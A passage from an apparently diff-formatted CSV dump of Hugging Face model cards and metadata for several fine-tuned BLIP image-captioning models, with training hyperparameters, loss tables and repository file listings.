""transformersInfo"": null, ""_id"": ""677f55cafdb4c42a512a9b51"", ""modelId"": ""Jakapong/jakudon"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=Jakapong/jakudon&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BJakapong%2Fjakudon%5D(%2FJakapong%2Fjakudon)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 851 |
+
rcfg/FashionBLIP-1,"---
|
| 852 |
+
library_name: transformers
|
| 853 |
+
license: apache-2.0
|
| 854 |
+
tags:
|
| 855 |
+
- vision
|
| 856 |
+
- image-captioning
|
| 857 |
+
- blip
|
| 858 |
+
- multimodal
|
| 859 |
+
- fashion
|
| 860 |
+
datasets:
|
| 861 |
+
- Marqo/fashion200k
|
| 862 |
+
base_model:
|
| 863 |
+
- Salesforce/blip-image-captioning-large
|
| 864 |
+
---
|
| 865 |
+
|
| 866 |
+
# Fine-Tuned BLIP Model for Fashion Image Captioning
|
| 867 |
+
|
| 868 |
+
This is a fine-tuned BLIP (Bootstrapped Language-Image Pretraining) model specifically designed for **fashion image captioning**. It was fine-tuned on the **Marqo Fashion Dataset** to generate descriptive and contextually relevant captions for fashion-related images.
|
| 869 |
+
|
| 870 |
+
## Model Details
|
| 871 |
+
|
| 872 |
+
- **Model Type:** BLIP (Vision-Language Pretraining)
|
| 873 |
+
- **Architecture:** BLIP uses a multimodal transformer architecture to jointly model visual and textual information.
|
| 874 |
+
- **Fine-Tuning Dataset:** [Marqo Fashion Dataset](https://github.com/marqo-ai/marqo) (a dataset containing fashion images and corresponding captions)
|
| 875 |
+
- **Task:** Fashion Image Captioning
|
| 876 |
+
- **License:** Apache 2.0
|
| 877 |
+
|
| 878 |
+
## Usage
|
| 879 |
+
|
| 880 |
+
You can use this model with the Hugging Face `transformers` library for fashion image captioning tasks.
|
| 881 |
+
|
| 882 |
+
### Installation
|
| 883 |
+
|
| 884 |
+
First, install the required libraries:
|
| 885 |
+
|
| 886 |
+
```bash
|
| 887 |
+
pip install transformers torch","{""id"": ""rcfg/FashionBLIP-1"", ""author"": ""rcfg"", ""sha"": ""b3e7f12a9b2fcf14c1eb53567de99051e9cf4201"", ""last_modified"": ""2025-02-16 20:22:44+00:00"", ""created_at"": ""2025-02-16 19:43:23+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 845, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""blip"", ""image-text-to-text"", ""vision"", ""image-captioning"", ""multimodal"", ""fashion"", ""dataset:Marqo/fashion200k"", ""base_model:Salesforce/blip-image-captioning-large"", ""base_model:finetune:Salesforce/blip-image-captioning-large"", ""license:apache-2.0"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""image-text-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- Salesforce/blip-image-captioning-large\ndatasets:\n- Marqo/fashion200k\nlibrary_name: transformers\nlicense: apache-2.0\ntags:\n- vision\n- image-captioning\n- blip\n- multimodal\n- fashion"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""BlipForConditionalGeneration""], ""model_type"": ""blip"", ""tokenizer_config"": {""cls_token"": ""[CLS]"", ""mask_token"": ""[MASK]"", ""pad_token"": ""[PAD]"", ""sep_token"": ""[SEP]"", ""unk_token"": ""[UNK]""}}, ""transformers_info"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.txt', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F32"": 469732924}, ""total"": 469732924}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-02-16 20:22:44+00:00"", ""cardData"": ""base_model:\n- Salesforce/blip-image-captioning-large\ndatasets:\n- Marqo/fashion200k\nlibrary_name: transformers\nlicense: apache-2.0\ntags:\n- vision\n- image-captioning\n- blip\n- multimodal\n- fashion"", ""transformersInfo"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""_id"": ""67b23fdb365784ce7f625096"", ""modelId"": ""rcfg/FashionBLIP-1"", ""usedStorage"": 1879010480}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=rcfg/FashionBLIP-1&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Brcfg%2FFashionBLIP-1%5D(%2Frcfg%2FFashionBLIP-1)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 888 |
+
manh08/blip-model,"---
|
| 889 |
+
base_model:
|
| 890 |
+
- Salesforce/blip-image-captioning-large
|
| 891 |
+
datasets:
|
| 892 |
+
- poloclub/diffusiondb
|
| 893 |
+
license: apache-2.0
|
| 894 |
+
language:
|
| 895 |
+
- aa
|
| 896 |
+
metrics:
|
| 897 |
+
- accuracy
|
| 898 |
+
- bertscore
|
| 899 |
+
new_version: Salesforce/blip-image-captioning-large
|
| 900 |
+
library_name: transformers
|
| 901 |
+
pipeline_tag: image-to-text
|
| 902 |
+
---","{""id"": ""manh08/blip-model"", ""author"": ""manh08"", ""sha"": ""1ace46ab34696fcd15ecc42586e1b17eb70d976a"", ""last_modified"": ""2025-03-01 18:01:25+00:00"", ""created_at"": ""2025-03-01 17:39:55+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""image-to-text"", ""aa"", ""dataset:poloclub/diffusiondb"", ""base_model:Salesforce/blip-image-captioning-large"", ""base_model:finetune:Salesforce/blip-image-captioning-large"", ""license:apache-2.0"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""image-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- Salesforce/blip-image-captioning-large\ndatasets:\n- poloclub/diffusiondb\nlanguage:\n- aa\nlibrary_name: transformers\nlicense: apache-2.0\nmetrics:\n- accuracy\n- bertscore\npipeline_tag: image-to-text\nnew_version: Salesforce/blip-image-captioning-large"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='test_part1.py', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-03-01 18:01:25+00:00"", ""cardData"": ""base_model:\n- Salesforce/blip-image-captioning-large\ndatasets:\n- poloclub/diffusiondb\nlanguage:\n- aa\nlibrary_name: transformers\nlicense: apache-2.0\nmetrics:\n- accuracy\n- bertscore\npipeline_tag: image-to-text\nnew_version: Salesforce/blip-image-captioning-large"", ""transformersInfo"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""_id"": ""67c3466bfb3123b861c97592"", ""modelId"": ""manh08/blip-model"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=manh08/blip-model&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bmanh08%2Fblip-model%5D(%2Fmanh08%2Fblip-model)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 903 |
+
saakshigupta/blip-finetuned-gradcam,"---
|
| 904 |
+
library_name: transformers
|
| 905 |
+
license: bsd-3-clause
|
| 906 |
+
base_model: Salesforce/blip-image-captioning-large
|
| 907 |
+
tags:
|
| 908 |
+
- generated_from_trainer
|
| 909 |
+
model-index:
|
| 910 |
+
- name: blip-finetuned-gradcam
|
| 911 |
+
results: []
|
| 912 |
+
---
|
| 913 |
+
|
| 914 |
+
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
|
| 915 |
+
should probably proofread and complete it, then remove this comment. -->
|
| 916 |
+
|
| 917 |
+
# blip-finetuned-gradcam
|
| 918 |
+
|
| 919 |
+
This model is a fine-tuned version of [Salesforce/blip-image-captioning-large](https://huggingface.co/Salesforce/blip-image-captioning-large) on an unknown dataset.
|
| 920 |
+
It achieves the following results on the evaluation set:
|
| 921 |
+
- Loss: 9.4287
|
| 922 |
+
|
| 923 |
+
## Model description
|
| 924 |
+
|
| 925 |
+
More information needed
|
| 926 |
+
|
| 927 |
+
## Intended uses & limitations
|
| 928 |
+
|
| 929 |
+
More information needed
|
| 930 |
+
|
| 931 |
+
## Training and evaluation data
|
| 932 |
+
|
| 933 |
+
More information needed
|
| 934 |
+
|
| 935 |
+
## Training procedure
|
| 936 |
+
|
| 937 |
+
### Training hyperparameters
|
| 938 |
+
|
| 939 |
+
The following hyperparameters were used during training:
|
| 940 |
+
- learning_rate: 5e-06
|
| 941 |
+
- train_batch_size: 2
|
| 942 |
+
- eval_batch_size: 2
|
| 943 |
+
- seed: 42
|
| 944 |
+
- gradient_accumulation_steps: 8
|
| 945 |
+
- total_train_batch_size: 16
|
| 946 |
+
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
|
| 947 |
+
- lr_scheduler_type: linear
|
| 948 |
+
- num_epochs: 10
|
| 949 |
+
- mixed_precision_training: Native AMP
|
| 950 |
+
|
| 951 |
+
### Training results
|
| 952 |
+
|
| 953 |
+
| Training Loss | Epoch | Step | Validation Loss |
|
| 954 |
+
|:-------------:|:------:|:----:|:---------------:|
|
| 955 |
+
| No log | 1.0 | 3 | 9.6959 |
|
| 956 |
+
| 8.3512 | 2.0 | 6 | 9.6199 |
|
| 957 |
+
| 8.3512 | 3.0 | 9 | 9.5671 |
|
| 958 |
+
| 6.7447 | 4.0 | 12 | 9.5177 |
|
| 959 |
+
| 6.6894 | 5.0 | 15 | 9.4673 |
|
| 960 |
+
| 6.6894 | 6.0 | 18 | 9.4367 |
|
| 961 |
+
| 8.0605 | 6.8889 | 20 | 9.4287 |
|
| 962 |
+
|
| 963 |
+
|
| 964 |
+
### Framework versions
|
| 965 |
+
|
| 966 |
+
- Transformers 4.50.3
|
| 967 |
+
- Pytorch 2.6.0+cu124
|
| 968 |
+
- Datasets 3.5.0
|
| 969 |
+
- Tokenizers 0.21.1
|
| 970 |
+
","{""id"": ""saakshigupta/blip-finetuned-gradcam"", ""author"": ""saakshigupta"", ""sha"": ""7b2cf98dd62d90fd171d2ee1bb13e4341abf9fbe"", ""last_modified"": ""2025-04-07 15:05:09+00:00"", ""created_at"": ""2025-04-07 14:30:56+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 17, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""blip"", ""image-text-to-text"", ""generated_from_trainer"", ""base_model:Salesforce/blip-image-captioning-large"", ""base_model:finetune:Salesforce/blip-image-captioning-large"", ""license:bsd-3-clause"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""image-text-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: Salesforce/blip-image-captioning-large\nlibrary_name: transformers\nlicense: bsd-3-clause\ntags:\n- generated_from_trainer\nmodel-index:\n- name: blip-finetuned-gradcam\n results: []"", ""widget_data"": null, ""model_index"": [{""name"": ""blip-finetuned-gradcam"", ""results"": []}], ""config"": {""architectures"": [""BlipForConditionalGeneration""], ""model_type"": ""blip"", ""tokenizer_config"": {""cls_token"": ""[CLS]"", ""mask_token"": ""[MASK]"", ""pad_token"": ""[PAD]"", ""sep_token"": ""[SEP]"", ""unk_token"": ""[UNK]""}}, ""transformers_info"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/training_args.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/vocab.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_args.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.txt', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F32"": 469732924}, ""total"": 469732924}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-04-07 15:05:09+00:00"", ""cardData"": ""base_model: Salesforce/blip-image-captioning-large\nlibrary_name: transformers\nlicense: bsd-3-clause\ntags:\n- generated_from_trainer\nmodel-index:\n- name: blip-finetuned-gradcam\n results: []"", ""transformersInfo"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""_id"": ""67f3e1a0f1a201ce2c9be85c"", ""modelId"": ""saakshigupta/blip-finetuned-gradcam"", ""usedStorage"": 10763569504}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=saakshigupta/blip-finetuned-gradcam&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bsaakshigupta%2Fblip-finetuned-gradcam%5D(%2Fsaakshigupta%2Fblip-finetuned-gradcam)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 971 |
+
saakshigupta/blip-finetuned-gradcam-optimized,"---
|
| 972 |
+
library_name: transformers
|
| 973 |
+
license: bsd-3-clause
|
| 974 |
+
base_model: Salesforce/blip-image-captioning-large
|
| 975 |
+
tags:
|
| 976 |
+
- generated_from_trainer
|
| 977 |
+
model-index:
|
| 978 |
+
- name: blip-finetuned-gradcam-optimized
|
| 979 |
+
results: []
|
| 980 |
+
---
|
| 981 |
+
|
| 982 |
+
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
|
| 983 |
+
should probably proofread and complete it, then remove this comment. -->
|
| 984 |
+
|
| 985 |
+
# blip-finetuned-gradcam-optimized
|
| 986 |
+
|
| 987 |
+
This model is a fine-tuned version of [Salesforce/blip-image-captioning-large](https://huggingface.co/Salesforce/blip-image-captioning-large) on an unknown dataset.
|
| 988 |
+
It achieves the following results on the evaluation set:
|
| 989 |
+
- Loss: 6.6748
|
| 990 |
+
|
| 991 |
+
## Model description
|
| 992 |
+
|
| 993 |
+
More information needed
|
| 994 |
+
|
| 995 |
+
## Intended uses & limitations
|
| 996 |
+
|
| 997 |
+
More information needed
|
| 998 |
+
|
| 999 |
+
## Training and evaluation data
|
| 1000 |
+
|
| 1001 |
+
More information needed
|
| 1002 |
+
|
| 1003 |
+
## Training procedure
|
| 1004 |
+
|
| 1005 |
+
### Training hyperparameters
|
| 1006 |
+
|
| 1007 |
+
The following hyperparameters were used during training:
|
| 1008 |
+
- learning_rate: 2e-06
|
| 1009 |
+
- train_batch_size: 2
|
| 1010 |
+
- eval_batch_size: 2
|
| 1011 |
+
- seed: 42
|
| 1012 |
+
- gradient_accumulation_steps: 4
|
| 1013 |
+
- total_train_batch_size: 8
|
| 1014 |
+
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
|
| 1015 |
+
- lr_scheduler_type: linear
|
| 1016 |
+
- lr_scheduler_warmup_steps: 50
|
| 1017 |
+
- num_epochs: 15
|
| 1018 |
+
- mixed_precision_training: Native AMP
|
| 1019 |
+
|
| 1020 |
+
### Training results
|
| 1021 |
+
|
| 1022 |
+
| Training Loss | Epoch | Step | Validation Loss |
|
| 1023 |
+
|:-------------:|:-------:|:----:|:---------------:|
|
| 1024 |
+
| 9.8985 | 0.4444 | 10 | 9.8608 |
|
| 1025 |
+
| 9.7965 | 0.8889 | 20 | 9.7389 |
|
| 1026 |
+
| 9.7009 | 1.3111 | 30 | 9.6374 |
|
| 1027 |
+
| 9.539 | 1.7556 | 40 | 9.5101 |
|
| 1028 |
+
| 8.2904 | 2.1778 | 50 | 9.1547 |
|
| 1029 |
+
| 8.7882 | 2.6222 | 60 | 8.7516 |
|
| 1030 |
+
| 7.6249 | 3.0444 | 70 | 8.4009 |
|
| 1031 |
+
| 8.2185 | 3.4889 | 80 | 8.1483 |
|
| 1032 |
+
| 8.0129 | 3.9333 | 90 | 7.9948 |
|
| 1033 |
+
| 7.8556 | 4.3556 | 100 | 7.8385 |
|
| 1034 |
+
| 7.7265 | 4.8 | 110 | 7.6990 |
|
| 1035 |
+
| 7.6183 | 5.2222 | 120 | 7.5757 |
|
| 1036 |
+
| 7.5 | 5.6667 | 130 | 7.4770 |
|
| 1037 |
+
| 6.6711 | 6.0889 | 140 | 7.3812 |
|
| 1038 |
+
| 7.3249 | 6.5333 | 150 | 7.3007 |
|
| 1039 |
+
| 7.2369 | 6.9778 | 160 | 7.2224 |
|
| 1040 |
+
| 7.1824 | 7.4 | 170 | 7.1548 |
|
| 1041 |
+
| 7.1173 | 7.8444 | 180 | 7.0876 |
|
| 1042 |
+
| 7.0568 | 8.2667 | 190 | 7.0291 |
|
| 1043 |
+
| 7.0033 | 8.7111 | 200 | 6.9772 |
|
| 1044 |
+
| 6.2525 | 9.1333 | 210 | 6.9274 |
|
| 1045 |
+
| 6.9084 | 9.5778 | 220 | 6.8845 |
|
| 1046 |
+
| 6.1803 | 10.0 | 230 | 6.8465 |
|
| 1047 |
+
| 6.8372 | 10.4444 | 240 | 6.8137 |
|
| 1048 |
+
| 6.807 | 10.8889 | 250 | 6.7842 |
|
| 1049 |
+
| 6.7844 | 11.3111 | 260 | 6.7578 |
|
| 1050 |
+
| 6.7499 | 11.7556 | 270 | 6.7369 |
|
| 1051 |
+
| 6.0823 | 12.1778 | 280 | 6.7185 |
|
| 1052 |
+
| 6.7188 | 12.6222 | 290 | 6.7038 |
|
| 1053 |
+
| 6.036 | 13.0444 | 300 | 6.6918 |
|
| 1054 |
+
| 6.7017 | 13.4889 | 310 | 6.6834 |
|
| 1055 |
+
| 6.7003 | 13.9333 | 320 | 6.6776 |
|
| 1056 |
+
| 6.6899 | 14.3556 | 330 | 6.6748 |
|
| 1057 |
+
|
| 1058 |
+
|
| 1059 |
+
### Framework versions
|
| 1060 |
+
|
| 1061 |
+
- Transformers 4.50.3
|
| 1062 |
+
- Pytorch 2.6.0+cu124
|
| 1063 |
+
- Datasets 3.5.0
|
| 1064 |
+
- Tokenizers 0.21.1
|
| 1065 |
+
","{""id"": ""saakshigupta/blip-finetuned-gradcam-optimized"", ""author"": ""saakshigupta"", ""sha"": ""9a54e8cca6d94e2ed72bce2a6cfae8b6dab753c7"", ""last_modified"": ""2025-04-07 15:44:03+00:00"", ""created_at"": ""2025-04-07 15:23:48+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 14, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""blip"", ""image-text-to-text"", ""generated_from_trainer"", ""base_model:Salesforce/blip-image-captioning-large"", ""base_model:finetune:Salesforce/blip-image-captioning-large"", ""license:bsd-3-clause"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""image-text-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: Salesforce/blip-image-captioning-large\nlibrary_name: transformers\nlicense: bsd-3-clause\ntags:\n- generated_from_trainer\nmodel-index:\n- name: blip-finetuned-gradcam-optimized\n results: []"", ""widget_data"": null, ""model_index"": [{""name"": ""blip-finetuned-gradcam-optimized"", ""results"": []}], ""config"": {""architectures"": [""BlipForConditionalGeneration""], ""model_type"": ""blip"", ""tokenizer_config"": {""cls_token"": ""[CLS]"", ""mask_token"": ""[MASK]"", ""pad_token"": ""[PAD]"", ""sep_token"": ""[SEP]"", ""unk_token"": ""[UNK]""}}, ""transformers_info"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/training_args.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='final/vocab.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_args.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.txt', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F32"": 469732924}, ""total"": 469732924}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-04-07 15:44:03+00:00"", ""cardData"": ""base_model: Salesforce/blip-image-captioning-large\nlibrary_name: transformers\nlicense: bsd-3-clause\ntags:\n- generated_from_trainer\nmodel-index:\n- name: blip-finetuned-gradcam-optimized\n results: []"", ""transformersInfo"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""_id"": ""67f3ee041738ef74e69a49d4"", ""modelId"": ""saakshigupta/blip-finetuned-gradcam-optimized"", ""usedStorage"": 18790110168}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=saakshigupta/blip-finetuned-gradcam-optimized&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bsaakshigupta%2Fblip-finetuned-gradcam-optimized%5D(%2Fsaakshigupta%2Fblip-finetuned-gradcam-optimized)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 1066 |
+
saakshigupta/deepfake-blip-large,"---
|
| 1067 |
+
library_name: transformers
|
| 1068 |
+
license: bsd-3-clause
|
| 1069 |
+
base_model: Salesforce/blip-image-captioning-large
|
| 1070 |
+
tags:
|
| 1071 |
+
- generated_from_trainer
|
| 1072 |
+
model-index:
|
| 1073 |
+
- name: deepfake-blip-large
|
| 1074 |
+
results: []
|
| 1075 |
+
---
|
| 1076 |
+
|
| 1077 |
+
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
|
| 1078 |
+
should probably proofread and complete it, then remove this comment. -->
|
| 1079 |
+
|
| 1080 |
+
# deepfake-blip-large
|
| 1081 |
+
|
| 1082 |
+
This model is a fine-tuned version of [Salesforce/blip-image-captioning-large](https://huggingface.co/Salesforce/blip-image-captioning-large) on an unknown dataset.
|
| 1083 |
+
It achieves the following results on the evaluation set:
|
| 1084 |
+
- Loss: 0.0467
|
| 1085 |
+
|
| 1086 |
+
## Model description
|
| 1087 |
+
|
| 1088 |
+
More information needed
|
| 1089 |
+
|
| 1090 |
+
## Intended uses & limitations
|
| 1091 |
+
|
| 1092 |
+
More information needed
|
| 1093 |
+
|
| 1094 |
+
## Training and evaluation data
|
| 1095 |
+
|
| 1096 |
+
More information needed
|
| 1097 |
+
|
| 1098 |
+
## Training procedure
|
| 1099 |
+
|
| 1100 |
+
### Training hyperparameters
|
| 1101 |
+
|
| 1102 |
+
The following hyperparameters were used during training:
|
| 1103 |
+
- learning_rate: 5e-05
|
| 1104 |
+
- train_batch_size: 4
|
| 1105 |
+
- eval_batch_size: 4
|
| 1106 |
+
- seed: 42
|
| 1107 |
+
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
|
| 1108 |
+
- lr_scheduler_type: linear
|
| 1109 |
+
- lr_scheduler_warmup_steps: 100
|
| 1110 |
+
- num_epochs: 5
|
| 1111 |
+
- mixed_precision_training: Native AMP
|
| 1112 |
+
|
| 1113 |
+
### Training results
|
| 1114 |
+
|
| 1115 |
+
| Training Loss | Epoch | Step | Validation Loss |
|
| 1116 |
+
|:-------------:|:-----:|:----:|:---------------:|
|
| 1117 |
+
| 7.7789 | 1.0 | 42 | 7.1881 |
|
| 1118 |
+
| 4.5699 | 2.0 | 84 | 3.6060 |
|
| 1119 |
+
| 0.6286 | 3.0 | 126 | 0.2297 |
|
| 1120 |
+
| 0.0928 | 4.0 | 168 | 0.0572 |
|
| 1121 |
+
| 0.0492 | 5.0 | 210 | 0.0467 |
|
| 1122 |
+
|
| 1123 |
+
|
| 1124 |
+
### Framework versions
|
| 1125 |
+
|
| 1126 |
+
- Transformers 4.50.3
|
| 1127 |
+
- Pytorch 2.6.0+cu124
|
| 1128 |
+
- Datasets 3.5.0
|
| 1129 |
+
- Tokenizers 0.21.1
|
| 1130 |
+
","{""id"": ""saakshigupta/deepfake-blip-large"", ""author"": ""saakshigupta"", ""sha"": ""4670858e16b553f499112000a2cbaa161abb6bad"", ""last_modified"": ""2025-04-09 17:08:46+00:00"", ""created_at"": ""2025-04-09 16:35:46+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 100, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""blip"", ""image-text-to-text"", ""generated_from_trainer"", ""base_model:Salesforce/blip-image-captioning-large"", ""base_model:finetune:Salesforce/blip-image-captioning-large"", ""license:bsd-3-clause"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""image-text-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: Salesforce/blip-image-captioning-large\nlibrary_name: transformers\nlicense: bsd-3-clause\ntags:\n- generated_from_trainer\nmodel-index:\n- name: deepfake-blip-large\n 